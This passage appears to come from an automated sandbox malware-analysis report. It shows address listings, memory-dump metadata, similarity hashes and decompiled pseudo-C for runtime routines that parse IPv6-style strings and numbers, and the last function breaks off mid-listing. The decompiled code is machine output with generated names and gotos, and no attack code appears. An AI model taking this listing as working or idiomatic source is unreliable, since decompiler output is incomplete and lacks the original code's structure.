                                0x00a5ebbb
                                0x00a92477
                                0x00a9247c
                                0x00a92486
                                0x00a9248b
                                0x00a92496
                                0x00a9249b
                                0x00a9249d
                                0x00a924a0
                                0x00a924a3
                                0x00a924aa
                                0x00a924aa
                                0x00a924a5
                                0x00a924a5
                                0x00a924a5
                                0x00a924ac
                                0x00a924af
                                0x00a924b0
                                0x00a924b3
                                0x00a924b9
                                0x00a924ba
                                0x00a924bb
                                0x00a924c6
                                0x00a924cb
                                0x00a924cd
                                0x00a924d0
                                0x00a924d1
                                0x00a924d4
                                0x00a924d6
                                0x00a924d9
                                0x00a924d9
                                0x00a924dc
                                0x00a924df
                                0x00a924e1
                                0x00a924e7
                                0x00a924e9
                                0x00a924ec
                                0x00a924ef
                                0x00a924f2
                                0x00a924f2
                                0x00a924ef
                                0x00a924e7
                                0x00a924fa
                                0x00a924ff
                                0x00a92501
                                0x00a92503
                                0x00a92506
                                0x00a9250b
                                0x00a5eb8c
                                0x00a5eb93
                                0x00000000
                                0x00000000
                                0x00a5eb93
                                0x00000000
                                0x00a5eb99
                                0x00a5ec85
                                0x00a5ec85
                                0x00a5ec85
                                0x00000000

                                Strings
                                • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00A9248D
                                • RTL: Re-Waiting, xrefs: 00A924FA
                                • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00A924BD
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                • API String ID: 0-3177188983
                                • Opcode ID: 3cd3f0e24be215edb052d125f152f41605e71ac1e039690ff6cd4b1d248ceb29
                                • Instruction ID: 40259af8de1ae65d96be468d530653063aa5a121805eecd220889448122b44a6
                                • Opcode Fuzzy Hash: 3cd3f0e24be215edb052d125f152f41605e71ac1e039690ff6cd4b1d248ceb29
                                • Instruction Fuzzy Hash: 3041E671600204BBCB24DB68DD85FAA77F8EF84720F208615F9559B2C1D734EE4187A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A6FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00A6FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E00A6EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E00A6EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E00A6685D(_t167, 4) == 0) {
								if(E00A6685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E00A6685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E00A6685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E00A48980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E00A3DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E00A6EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E00A6EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                0x00a6fcd1
                                0x00a6fcd6
                                0x00a6fcd9
                                0x00a6fcdc
                                0x00a6fcdf
                                0x00a6fce2
                                0x00a6fce5
                                0x00a6fce8
                                0x00a6fceb
                                0x00a6fced
                                0x00a6fced
                                0x00a6fcf3
                                0x00000000
                                0x00000000
                                0x00a6fcfc
                                0x00a6fcfe
                                0x00a6fdc1
                                0x00a9ecbd
                                0x00000000
                                0x00a9eccc
                                0x00a9eccc
                                0x00a9ecd2
                                0x00000000
                                0x00000000
                                0x00a9ecdf
                                0x00a9ece0
                                0x00a9ece4
                                0x00a9eceb
                                0x00a9ecee
                                0x00a9eca8
                                0x00a9eca8
                                0x00a9ecaa
                                0x00a6fd76
                                0x00a6fd79
                                0x00a6fdb4
                                0x00a6fdb5
                                0x00a6fdb6
                                0x00000000
                                0x00a6fdb6
                                0x00a6fd7e
                                0x00a9ecfc
                                0x00a6fe2f
                                0x00000000
                                0x00a6fe2f
                                0x00a9ed08
                                0x00a9ed0f
                                0x00a9ed17
                                0x00a9ed1b
                                0x00000000
                                0x00a9ed1b
                                0x00a6fd88
                                0x00000000
                                0x00000000
                                0x00a6fd94
                                0x00a6fd99
                                0x00a6fda1
                                0x00000000
                                0x00000000
                                0x00a6fdb0
                                0x00000000
                                0x00a6fdb0
                                0x00a9ecbd
                                0x00a6fdc7
                                0x00a6fdcb
                                0x00000000
                                0x00a6fdd7
                                0x00a6fde3
                                0x00a6fe06
                                0x00a81fe7
                                0x00000000
                                0x00000000
                                0x00a81fef
                                0x00a81ff0
                                0x00a81ff4
                                0x00a81ff7
                                0x00a81ffa
                                0x00a81ffd
                                0x00a82000
                                0x00000000
                                0x00000000
                                0x00a9ecf1
                                0x00000000
                                0x00a9ecf1
                                0x00000000
                                0x00a6fe06
                                0x00a6fde8
                                0x00a6fdec
                                0x00a6fdef
                                0x00a6fdf2
                                0x00000000
                                0x00a6fdf2
                                0x00a6fdcb
                                0x00a6fd04
                                0x00a6fd05
                                0x00a9ec67
                                0x00000000
                                0x00000000
                                0x00a9ec6f
                                0x00000000
                                0x00a9ec6f
                                0x00a6fd13
                                0x00a6fd3c
                                0x00a6fd40
                                0x00a9ec75
                                0x00a9ec7a
                                0x00000000
                                0x00a9ec8a
                                0x00a9ec8a
                                0x00a9ec90
                                0x00a9ecb2
                                0x00a6fd73
                                0x00a6fd73
                                0x00000000
                                0x00a6fd73
                                0x00a9ec95
                                0x00000000
                                0x00000000
                                0x00a9eca1
                                0x00a9eca4
                                0x00a9eca5
                                0x00000000
                                0x00a9eca5
                                0x00a9ec7a
                                0x00a6fd4a
                                0x00000000
                                0x00a6fd6e
                                0x00a6fd6e
                                0x00a6fd71
                                0x00000000
                                0x00a6fd71
                                0x00a6fd4a
                                0x00a6fd21
                                0x00a7a3a1
                                0x00000000
                                0x00a7a3a1
                                0x00a6fd36
                                0x00a8200b
                                0x00a82012
                                0x00000000
                                0x00000000
                                0x00a82018
                                0x00000000
                                0x00a82018
                                0x00000000
                                0x00a6fd36
                                0x00a6fe0f
                                0x00a6fe16
                                0x00a7a3ad
                                0x00000000
                                0x00000000
                                0x00a7a3b3
                                0x00a7a3b3
                                0x00a6fe1f
                                0x00a9ed25
                                0x00a9ed86
                                0x00000000
                                0x00000000
                                0x00a9ed91
                                0x00a9ed95
                                0x00a9ed95
                                0x00a9ed9a
                                0x00a9edad
                                0x00a9edb3
                                0x00a9edba
                                0x00a9edc4
                                0x00a9edc9
                                0x00000000
                                0x00a9edcc
                                0x00a9ed2a
                                0x00a9ed55
                                0x00000000
                                0x00000000
                                0x00a9ed61
                                0x00a9ed66
                                0x00a9ed6e
                                0x00000000
                                0x00000000
                                0x00a9ed7d
                                0x00000000
                                0x00a9ed7d
                                0x00a9ed30
                                0x00000000
                                0x00000000
                                0x00a9ed3c
                                0x00a9ed43
                                0x00a9ed4b
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: __fassign
                                • String ID:
                                • API String ID: 3965848254-0
                                • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                • Instruction ID: 08c5ea116333cc378989731cce979bdabdeeb7d60e2e22dd3df06194297701da
                                • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                • Instruction Fuzzy Hash: 84919271E0020AEFDF28DFA8D8456EEBBB4FF55304F24807AD451A7262E7315A91CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00AE5CFA, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMON
                                Download Yara Rule
                                C-Code - Quality: 95%
                                			E00AE5CFA(void* __edx, void* __edi, signed int __esi, signed int _a4, signed int _a8, signed char _a12, signed int _a16) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				signed char _v36;
				signed char _v40;
				void* __ebx;
				intOrPtr* _t117;
				signed int _t118;
				void* _t119;
				intOrPtr _t121;
				void* _t122;
				void* _t123;
				signed int _t124;
				signed int _t125;
				signed int _t129;
				signed int _t133;
				signed int _t135;
				void* _t141;
				void* _t143;
				signed char _t144;
				signed int _t145;
				signed int _t148;
				signed int _t149;
				intOrPtr* _t151;
				signed char _t153;
				signed int _t160;
				void* _t162;
				signed char _t163;
				void* _t167;
				signed int _t168;
				intOrPtr* _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				void* _t176;

				_t173 = __esi;
				_t167 = __edi;
				_t162 = __edx;
				_t151 = _a8;
				_t117 = _a4;
				_t148 = 0;
				if(_t151 != 0) {
					 *_t151 = _t117;
				}
				if(_t117 != _t148) {
					__eflags = _a12 - _t148;
					if(_a12 == _t148) {
						L7:
						_push(_t173);
						_push(_t167);
						_v20 = _t148;
						_v16 = _t148;
						_v5 =  *_t117;
						_t9 = _t117 + 1; // 0x1
						_t168 = _t9;
						while(1) {
							_t118 = _v5 & 0x000000ff;
							_t173 = _t173 | 0xffffffff;
							__eflags = _t118 - _t173;
							if(_t118 != _t173) {
								_t173 = _t118;
							}
							_t119 = E00A70867();
							_t163 = 8;
							__eflags =  *(_t119 + _t173 * 2) & _t163;
							if(( *(_t119 + _t173 * 2) & _t163) == 0) {
								break;
							} else {
								goto L11;
							}
							do {
								L11:
								_t145 =  *_t168;
								_t168 = _t168 + 1;
								__eflags = _t145 - _v5;
							} while (_t145 == _v5);
							_v5 = _t145;
						}
						__eflags = _v5 - 0x2d;
						_v12 = _t168;
						if(_v5 != 0x2d) {
							__eflags = _v5 - 0x2b;
							if(_v5 != 0x2b) {
								L17:
								_t153 = 0x10;
								__eflags = _a12 - _t148;
								if(_a12 != _t148) {
									L24:
									__eflags = _a12 - _t153;
									if(_a12 != _t153) {
										L29:
										asm("cdq");
										_t169 = _a12;
										_v40 = _t163;
										_t121 = E00A3F920(0xffffffff, 0xffffffff, _a12, _t163);
										_v36 = _t153;
										_v32 = _t148;
										_v28 = _t121;
										_v24 = _t163;
										while(1) {
											_t174 = _v5 & 0x000000ff;
											_t148 = _t148 | 0xffffffff;
											__eflags = _t174 - _t148;
											if(_t174 != _t148) {
												_t148 = _t174;
											}
											_t122 = E00A70867();
											__eflags =  *(_t122 + _t148 * 2) & 0x00000004;
											if(( *(_t122 + _t148 * 2) & 0x00000004) == 0) {
												goto L34;
											}
											_t176 = _v5 - 0x30;
											L40:
											__eflags = _t176 - _a12;
											if(_t176 >= _a12) {
												L50:
												_t149 = _a16;
												_v12 = _v12 - 1;
												__eflags = _t149 & 0x00000008;
												if((_t149 & 0x00000008) != 0) {
													__eflags = _t149 & 0x00000004;
													if((_t149 & 0x00000004) != 0) {
														L66:
														 *0xb192c4 = 0x22;
														__eflags = _t149 & 0x00000001;
														if((_t149 & 0x00000001) == 0) {
															__eflags = _t149 & 0x00000002;
															if((_t149 & 0x00000002) == 0) {
																_t104 =  &_v20;
																 *_t104 = _v20 | 0xffffffff;
																__eflags =  *_t104;
																_v16 = 0x7fffffff;
															} else {
																_v20 = _v20 & 0x00000000;
																_v16 = 0x80000000;
															}
														} else {
															_v20 = _v20 | 0xffffffff;
															_v16 = _v16 | 0xffffffff;
														}
														L71:
														_t124 = _a8;
														__eflags = _t124;
														if(_t124 != 0) {
															 *_t124 = _v12;
														}
														__eflags = _t149 & 0x00000002;
														if((_t149 & 0x00000002) != 0) {
															asm("adc ecx, 0x0");
															_v20 =  ~_v20;
															_v16 =  ~_v16;
														}
														_t125 = _v20;
														L76:
														return _t125;
													}
													__eflags = _t149 & 0x00000001;
													if((_t149 & 0x00000001) != 0) {
														goto L71;
													}
													_t129 = _t149 & 0x00000002;
													__eflags = _t129;
													if(_t129 == 0) {
														L62:
														__eflags = _t129;
														if(_t129 != 0) {
															goto L71;
														}
														__eflags = _v16 - 0x7fffffff;
														if(__eflags < 0) {
															goto L71;
														}
														if(__eflags > 0) {
															goto L66;
														}
														__eflags = _v20 - 0xffffffff;
														if(_v20 <= 0xffffffff) {
															goto L71;
														}
														goto L66;
													}
													__eflags = _v16 - 0x80000000;
													if(__eflags > 0) {
														goto L66;
													}
													if(__eflags < 0) {
														goto L62;
													}
													__eflags = _v20;
													if(_v20 > 0) {
														goto L66;
													}
													goto L62;
												}
												__eflags = _a8;
												if(_a8 != 0) {
													_v12 = _a4;
												}
												_v20 = 0;
												_v16 = 0;
												goto L71;
											}
											_t160 = _v16;
											_a16 = _a16 | 0x00000008;
											__eflags = _t160 - _v24;
											if(__eflags < 0) {
												L54:
												_t135 = E00A5F1E0(_t169, _v40, _v20, _t160) + _t176;
												__eflags = _t135;
												asm("adc edx, ecx");
												_v20 = _t135;
												_v16 = _t163;
												L55:
												_v12 = _v12 + 1;
												_v5 =  *_v12;
												continue;
											}
											if(__eflags > 0) {
												L44:
												__eflags = _v20 - _v28;
												if(_v20 != _v28) {
													L49:
													_a16 = _a16 | 0x00000004;
													__eflags = _a8;
													if(_a8 != 0) {
														goto L55;
													}
													goto L50;
												}
												__eflags = _t160 - _v24;
												if(_t160 != _v24) {
													goto L49;
												}
												__eflags = 0 - _v32;
												if(__eflags < 0) {
													goto L54;
												}
												if(__eflags > 0) {
													goto L49;
												}
												__eflags = _t176 - _v36;
												if(_t176 <= _v36) {
													goto L54;
												}
												goto L49;
											}
											__eflags = _v20 - _v28;
											if(_v20 < _v28) {
												goto L54;
											}
											goto L44;
											L34:
											__eflags = _t174 - 0xffffffff;
											if(_t174 == 0xffffffff) {
												_t174 = _t174;
												__eflags = _t174;
											}
											_t123 = E00A70867();
											__eflags =  *(_t123 + _t174 * 2) & 0x00000103;
											if(( *(_t123 + _t174 * 2) & 0x00000103) == 0) {
												goto L50;
											} else {
												__eflags = _v5 - 0x61 - 0x19;
												_t133 = _v5;
												if(_v5 - 0x61 <= 0x19) {
													_t133 = _t133 - 0x20;
													__eflags = _t133;
												}
												_t51 = _t133 - 0x37; // -44
												_t176 = _t51;
												goto L40;
											}
										}
									}
									__eflags = _v5 - 0x30;
									if(_v5 != 0x30) {
										goto L29;
									}
									_t141 =  *_t168;
									__eflags = _t141 - 0x78;
									if(_t141 == 0x78) {
										L28:
										_t171 = _t168 + 1;
										_t172 = _t171 + 1;
										__eflags = _t172;
										_v5 =  *_t171;
										_v12 = _t172;
										goto L29;
									}
									__eflags = _t141 - 0x58;
									if(_t141 != 0x58) {
										goto L29;
									}
									goto L28;
								}
								__eflags = _v5 - 0x30;
								if(_v5 == 0x30) {
									_t143 =  *_t168;
									__eflags = _t143 - 0x78;
									if(_t143 == 0x78) {
										L23:
										_a12 = _t153;
										goto L24;
									}
									__eflags = _t143 - 0x58;
									if(_t143 == 0x58) {
										goto L23;
									}
									_a12 = _t163;
									goto L29;
								}
								_a12 = 0xa;
								goto L29;
							}
							L16:
							_t144 =  *_t168;
							_t168 = _t168 + 1;
							__eflags = _t168;
							_v12 = _t168;
							_v5 = _t144;
							goto L17;
						}
						_a16 = _a16 | 0x00000002;
						goto L16;
					}
					__eflags = _a12 - 2;
					if(_a12 < 2) {
						goto L3;
					}
					__eflags = _a12 - 0x24;
					if(_a12 > 0x24) {
						goto L3;
					}
					goto L7;
				}
				L3:
				_push(_t148);
				_push(_t148);
				_push(_t148);
				_push(_t148);
				_push(_t148);
				E00ABCECC(_t148, _t151, _t162, _t167, _t173);
				_t125 = 0;
				goto L76;
			}










































                                0x00ae5cfa
                                0x00ae5cfa
                                0x00ae5cfa
                                0x00ae5cff
                                0x00ae5d02
                                0x00ae5d09
                                0x00ae5d0d
                                0x00ae5d0f
                                0x00ae5d0f
                                0x00ae5d13
                                0x00ae5d2b
                                0x00ae5d2e
                                0x00ae5d3c
                                0x00ae5d3e
                                0x00ae5d3f
                                0x00ae5d40
                                0x00ae5d43
                                0x00ae5d46
                                0x00ae5d49
                                0x00ae5d49
                                0x00ae5d4c
                                0x00ae5d4c
                                0x00ae5d50
                                0x00ae5d53
                                0x00ae5d55
                                0x00ae5d57
                                0x00ae5d57
                                0x00ae5d59
                                0x00ae5d60
                                0x00ae5d61
                                0x00ae5d64
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00ae5d66
                                0x00ae5d66
                                0x00ae5d66
                                0x00ae5d68
                                0x00ae5d69
                                0x00ae5d69
                                0x00ae5d6e
                                0x00ae5d6e
                                0x00ae5d73
                                0x00ae5d77
                                0x00ae5d7a
                                0x00ae5d82
                                0x00ae5d86
                                0x00ae5d91
                                0x00ae5d93
                                0x00ae5d94
                                0x00ae5d97
                                0x00ae5dba
                                0x00ae5dba
                                0x00ae5dbd
                                0x00ae5dd9
                                0x00ae5ddc
                                0x00ae5dde
                                0x00ae5de5
                                0x00ae5de8
                                0x00ae5ded
                                0x00ae5df0
                                0x00ae5df3
                                0x00ae5df6
                                0x00ae5df9
                                0x00ae5df9
                                0x00ae5dfd
                                0x00ae5e00
                                0x00ae5e02
                                0x00ae5e04
                                0x00ae5e04
                                0x00ae5e06
                                0x00ae5e0b
                                0x00ae5e0f
                                0x00000000
                                0x00000000
                                0x00ae5e15
                                0x00ae5e44
                                0x00ae5e44
                                0x00ae5e47
                                0x00ae5e84
                                0x00ae5e84
                                0x00ae5e87
                                0x00ae5e8c
                                0x00ae5e8f
                                0x00ae5edc
                                0x00ae5edf
                                0x00ae5f0b
                                0x00ae5f0b
                                0x00ae5f15
                                0x00ae5f18
                                0x00ae5f24
                                0x00ae5f27
                                0x00ae5f32
                                0x00ae5f32
                                0x00ae5f32
                                0x00ae5f36
                                0x00ae5f29
                                0x00ae5f29
                                0x00ae5f2d
                                0x00ae5f2d
                                0x00ae5f1a
                                0x00ae5f1a
                                0x00ae5f1e
                                0x00ae5f1e
                                0x00ae5f39
                                0x00ae5f39
                                0x00ae5f3c
                                0x00ae5f3e
                                0x00ae5f43
                                0x00ae5f43
                                0x00ae5f45
                                0x00ae5f48
                                0x00ae5f52
                                0x00ae5f57
                                0x00ae5f5a
                                0x00ae5f5a
                                0x00ae5f5d
                                0x00ae5f63
                                0x00ae5f65
                                0x00ae5f65
                                0x00ae5ee1
                                0x00ae5ee4
                                0x00000000
                                0x00000000
                                0x00ae5ee8
                                0x00ae5ee8
                                0x00ae5eeb
                                0x00ae5efa
                                0x00ae5efa
                                0x00ae5efc
                                0x00000000
                                0x00000000
                                0x00ae5efe
                                0x00ae5f01
                                0x00000000
                                0x00000000
                                0x00ae5f03
                                0x00000000
                                0x00000000
                                0x00ae5f05
                                0x00ae5f09
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00ae5f09
                                0x00ae5eed
                                0x00ae5ef0
                                0x00000000
                                0x00000000
                                0x00ae5ef2
                                0x00000000
                                0x00000000
                                0x00ae5ef4
                                0x00ae5ef8
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00ae5ef8
                                0x00ae5e93
                                0x00ae5e96
                                0x00ae5e9b
                                0x00ae5e9b
                                0x00ae5e9e
                                0x00ae5ea1
                                0x00000000
                                0x00ae5ea1
                                0x00ae5e49
                                0x00ae5e4c
                                0x00ae5e50
                                0x00ae5e53
                                0x00ae5ea9
                                0x00ae5eb8
                                0x00ae5eb8
                                0x00ae5eba
                                0x00ae5ebc
                                0x00ae5ebf
                                0x00ae5ec2
                                0x00ae5ec7
                                0x00ae5eca
                                0x00000000
                                0x00ae5eca
                                0x00ae5e55
                                0x00ae5e5f
                                0x00ae5e62
                                0x00ae5e65
                                0x00ae5e7a
                                0x00ae5e7a
                                0x00ae5e7e
                                0x00ae5e82
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00ae5e82
                                0x00ae5e67
                                0x00ae5e6a
                                0x00000000
                                0x00000000
                                0x00ae5e6e
                                0x00ae5e71
                                0x00000000
                                0x00000000
                                0x00ae5e73
                                0x00000000
                                0x00000000
                                0x00ae5e75
                                0x00ae5e78
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00ae5e78
                                0x00ae5e5a
                                0x00ae5e5d
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00ae5e1a
                                0x00ae5e1a
                                0x00ae5e1d
                                0x00ae5e1f
                                0x00ae5e1f
                                0x00ae5e1f
                                0x00ae5e21
                                0x00ae5e2b
                                0x00ae5e2f
                                0x00000000
                                0x00ae5e31
                                0x00ae5e36
                                0x00ae5e38
                                0x00ae5e3c
                                0x00ae5e3e
                                0x00ae5e3e
                                0x00ae5e3e
                                0x00ae5e41
                                0x00ae5e41
                                0x00000000
                                0x00ae5e41
                                0x00ae5e2f
                                0x00ae5df9
                                0x00ae5dbf
                                0x00ae5dc3
                                0x00000000
                                0x00000000
                                0x00ae5dc5
                                0x00ae5dc7
                                0x00ae5dc9
                                0x00ae5dcf
                                0x00ae5dcf
                                0x00ae5dd2
                                0x00ae5dd2
                                0x00ae5dd3
                                0x00ae5dd6
                                0x00000000
                                0x00ae5dd6
                                0x00ae5dcb
                                0x00ae5dcd
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00ae5dcd
                                0x00ae5d99
                                0x00ae5d9d
                                0x00ae5da8
                                0x00ae5daa
                                0x00ae5dac
                                0x00ae5db7
                                0x00ae5db7
                                0x00000000
                                0x00ae5db7
                                0x00ae5dae
                                0x00ae5db0
                                0x00000000
                                0x00000000
                                0x00ae5db2
                                0x00000000
                                0x00ae5db2
                                0x00ae5d9f
                                0x00000000
                                0x00ae5d9f
                                0x00ae5d88
                                0x00ae5d88
                                0x00ae5d8a
                                0x00ae5d8a
                                0x00ae5d8b
                                0x00ae5d8e
                                0x00000000
                                0x00ae5d8e
                                0x00ae5d7c
                                0x00000000
                                0x00ae5d7c
                                0x00ae5d30
                                0x00ae5d34
                                0x00000000
                                0x00000000
                                0x00ae5d36
                                0x00ae5d3a
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00ae5d3a
                                0x00ae5d15
                                0x00ae5d15
                                0x00ae5d16
                                0x00ae5d17
                                0x00ae5d18
                                0x00ae5d19
                                0x00ae5d1a
                                0x00ae5d22
                                0x00000000

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: __aulldvrm
                                • String ID: $$0
                                • API String ID: 1302938615-389342756
                                • Opcode ID: ef5f2594bc93f225c5dd7ceb8a3cf1dc692cc4306dbd350a604c46818f9a29d5
                                • Instruction ID: bf61d24c9f8a09b62eb94095d233a484c921b88cc0c05d326dc38dc055552d3b
                                • Opcode Fuzzy Hash: ef5f2594bc93f225c5dd7ceb8a3cf1dc692cc4306dbd350a604c46818f9a29d5
                                • Instruction Fuzzy Hash: BB91A130D04ACAEFDF24DFBAE8953EDBBB1AF41318F14465AD4A1A7291C7748A41CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A6FE4F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                Download Yara Rule
                                C-Code - Quality: 92%
                                			E00A6FE4F(void* __edx, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16) {
				signed int _v8;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				void* _t18;
				signed int _t26;
				intOrPtr _t31;
				void* _t37;
				intOrPtr* _t38;
				intOrPtr _t39;
				void* _t40;
				signed int _t43;
				void* _t44;

				_t37 = __edx;
				_t15 =  *0xb12088; // 0x77412276
				_v8 = _t15 ^ _t43;
				_t17 = _a4;
				_t31 = _a12;
				_t38 = _a16;
				if(_a4 == 0 || _t38 == 0) {
					L7:
					_t18 = 0xc000000d;
				} else {
					if(_t31 == 0) {
						if( *_t38 == _t31) {
							goto L3;
						} else {
							goto L7;
